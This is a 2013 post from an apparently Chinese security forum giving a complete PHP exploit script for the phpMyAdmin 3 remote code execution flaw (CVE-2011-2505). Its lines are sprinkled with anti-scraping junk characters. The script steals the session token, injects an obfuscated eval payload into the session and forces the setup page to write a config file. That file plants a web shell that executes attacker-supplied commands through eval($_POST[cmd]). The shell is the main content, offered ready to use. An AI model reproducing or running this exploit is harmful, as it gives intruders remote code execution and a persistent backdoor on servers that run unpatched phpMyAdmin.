找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2104|回复: 0
打印 上一主题 下一主题

phpadmin3 remote code execute php版本exploit

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-21 09:13:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。3 t: b' a. s. z

' x- ?9 P- V8 v9 i+ O! i( z' @- i4 E* N昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
% y! X- o. y) m& P0 x4 w7 d& [! d9 u4 |1 p2 y/ Z, N- @! K
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
6 `* I- F1 E/ I5 L6 \! y一是session.auto_start = 1;& W' h, d: V* l
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
7 O9 k& E& a$ s* H3 m2 O! s$ N当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
! q4 _8 N. c9 O* `4 V* i
  U3 W+ Q' r9 [7 ~7 `2 ^在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。5 H  f9 q- ^" }. G# r1 k4 z

, u4 k8 x$ @" W于是写了这个php版本的exp,代码如下:
0 `$ {! M1 C0 F3 j- j" ^2 Y; C6 h7 C7 b1 h6 j, I) `+ u9 S
#!/usr/bin/php" E0 Q3 p8 w& ?( b* D2 m& T. h
<?php7 K9 T0 s( }' i" [' b
print_r('
  z& X; G. m4 B8 X8 _+---------------------------------------------------------------------------+6 I8 x7 v& ?1 B. r0 |8 ^
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]( x0 v3 K* }. U7 {; \; Q5 @
by oldjun(www.oldjun.com)
; o4 J: I5 A6 b( m6 gwelcome to www.t00ls.net, G* }: t4 A: G/ t( S
mail: oldjun@gmail.com
. k. Q: s% q2 r% _Assigned CVE id: CVE-2011-2505
+ {. {# J5 [9 i' h+---------------------------------------------------------------------------+
+ W3 h2 F# W& G2 g; n, ]');* B4 m: Z$ S# U0 ~' k0 x

# O% j* f1 D' @- T# G9 M2 S- @/**3 l: V" X  v+ L1 o
* working when the directory:"config" exists and is writeable.
' ^3 V* Z; L# N. M9 r**/
" t7 U# J% I8 O# Z5 |$ @
9 {$ s: d( h  y: S& _3 q. F+ pif ($argc < 3) {
% k6 W/ S; m: v( z$ }    print_r('2 w8 W' x% B6 m0 g- W. L
+---------------------------------------------------------------------------+8 D) \! y4 u8 @( v) _( l. H
Usage: php '.$argv[0].' host path1 A% ?1 X1 P9 B7 W9 u
host:      target server (ip/hostname)
1 I! i. h* S, o' d  S1 Apath:      path to pma3
6 M6 C9 Q/ {( j; UExample:
2 k8 a; H# {8 {- R* wphp '.$argv[0].' localhost /pma/
& w; ?' N  H& N$ }" v% _; Z& u" l+---------------------------------------------------------------------------+9 w  V' e; O3 \& u
');, ]4 i" `4 B  [$ E0 O8 v
    exit;
2 R' I0 a- U5 r7 j1 v. E  ?/ k% z}
0 E# U4 Q, G6 @2 U0 w# l! H
1 s( m9 A' }$ p: a/ N7 k0 z$host = $argv[1];) x9 R$ T2 f& ~# n: X# u4 O
$path = $argv[2];' s6 h" \5 |1 s+ {  F

$ [: K6 r" D& D4 ~7 w# @; C/**
/ q. |2 b2 {- O% v * Try to determine if the directory:"config" exists
  k% l7 e/ X& T' o# s**/
( H; g* i$ P. |  y2 @8 J  ?  [echo "[+] Try to determine if the directory:config exists....\n";
4 L6 I: E* l" Z$returnstr=php_request('config/');
" U  j3 v8 {4 V: ^" a: g  h9 oif(strpos($returnstr,'404')){0 D8 `0 Y7 L- `8 ?
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
' U" ?# ~* M) _% b3 m2 b  d3 i& e2 B}
: w- e) e' z/ m! M9 D5 J, C% k8 P1 D+ g$ H: D: F
/**
1 _  n- S  p, }' ]; Y3 h! A8 F * Try to get token and sessionid
: D/ \9 x; c8 _**/& `3 S# c2 l" T& R0 I
echo "[+] Try to get token and sessionid....\n";
! N8 Z0 G& i) {( D$result=php_request('index.php');
4 O5 ~4 \. c! Mpreg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);! i7 Y% t0 ^% l& r/ L# G* e) H
$token=$resp[3];
; r! r" g! j% f. G% H6 J% v$sessionid=$resp[1];1 `) F- g! F. k- b& Y. S$ f3 E
if($token && $sessionid){
8 P2 D/ F5 |" ^+ A) o    echo "[+] tokentoken\n";/ D* Q. Q" z5 L5 ?
    echo "[+] Session IDsessionid\n";8 \- g) U8 s; k8 `0 c: H
}else{3 W2 {8 e' f4 r+ ^+ N  K
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");2 G0 p5 H0 X& g8 K% W
}
, E7 g/ F; P. C5 }9 U& B4 I" \; ~# V% H/ |' Z) \0 G; a+ j
/**  h( }- C: {# _2 B: t$ e
* Try to insert shell into session
+ q8 u2 ]1 @& q7 {0 B/ l3 p**/7 X% J0 `- A3 R
echo "[+] Try to insert shell into session....\n";4 S+ h! |, f5 o0 M
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
& Q7 i/ U3 t$ s4 Y/ r: A! J9 G
; x) l! n1 q; k. n; w' H0 [* A7 C/**
; U  Z/ I; K* m2 X: g, W* V1 P/ b * Try to create webshell8 l: P5 B2 O6 F% a* R% h$ A
**/( N8 o7 l% |& e
echo "[+] Try to create webshell....\n";0 {. N+ ~, v& r$ J% G  c; y
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
# l3 P7 l& p+ A4 O/ H2 T- x2 s/**
: o# Y2 s) A2 b2 A' f: g2 b1 M * Try to check if the webshell was created successfully( ]% y8 X5 B2 m  n% P( Q0 S
**/( j" C( ]4 P3 J
echo "[+] Try to check if the webshell was created successfully....\n";: G3 ]7 K/ P4 L6 b
$content=php_request('config/config.inc.php');
  a1 e, W) |5 o% A! m0 N5 m# tif(strpos($content,'t00ls')){! g2 D( r0 z5 l/ n
    echo "[+] Congratulations! Expoilt successfully....\n";
0 v1 M; L/ D, `; U    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
3 i1 B. p/ u% \3 P+ z8 T}else{
1 K; [5 h( k+ x    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
4 Q5 S) U' ]2 _}0 s1 E/ H7 `! [) h1 V

3 u" ?( v) g1 v9 i9 B- bfunction php_request($url,$data='',$cookie=''){
7 i1 I+ s! w0 l4 \    global  $host, $path;/ u; o& B( k" j- L
   
9 g1 D3 }7 w9 E: [/ s    $method=$data?'POST':'GET';
* v# Z( [& k+ o6 H  Y2 S8 C+ Y    * F/ Q6 ^1 e" m* W' d3 q  R
    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
# j( q: X# m" F# q+ q  }4 J    $packet .= "Accept: */*\r\n";$ w  v  t) \( i; f9 T
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
1 S1 h5 c  A; M4 u1 D    $packet .= "Host: $host\r\n";' h/ a4 F  b9 H: t
    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";; L$ t  F/ i/ E$ N* J
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
" |* v" e: b" h# h8 `% ^    $packet .= $cookie?"Cookie: $cookie\r\n":"";  q( Z& ~1 I2 J! p/ e& |6 x3 z
    $packet .= "Connection: Close\r\n\r\n";+ g" b+ ~! Q, P9 U6 I
    $packet .= $data?$data:"";
/ _: T9 ^4 \) z9 _$ j/ [6 I( v; Q
    $fp = fsockopen(gethostbyname($host), 80);; U7 q- n7 q, \, c
    if (!$fp) {9 F9 T. V! M+ m7 m1 q1 Y3 I* k
    echo 'No response from '.$host; die;
. Z8 h' U7 b! \: y9 d; s    }; W5 t4 [+ Q6 S, G& W
    fputs($fp, $packet);/ `  a# A# h- d6 P7 H
: ^0 e2 n) I( \3 _1 L2 o) }
    $resp = '';
7 b) w. T9 V* z" h4 j# E7 F! ?# n5 K2 c1 B' M9 G0 T- g9 E
    while ($fp && !feof($fp))
: ?7 v$ a" w9 P* X% b        $resp .= fread($fp, 1024);8 F8 D$ a' U8 _' f

# |% u. U# X7 |& C- t- B    return $resp;: |7 w/ \: K% u$ N2 h
}
8 T3 E' A% X" t9 W8 |3 J# V2 o    + @7 l. M6 Y* z3 S8 c/ `
?> 6 U+ n) d3 ?: T) n' @9 t
.
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表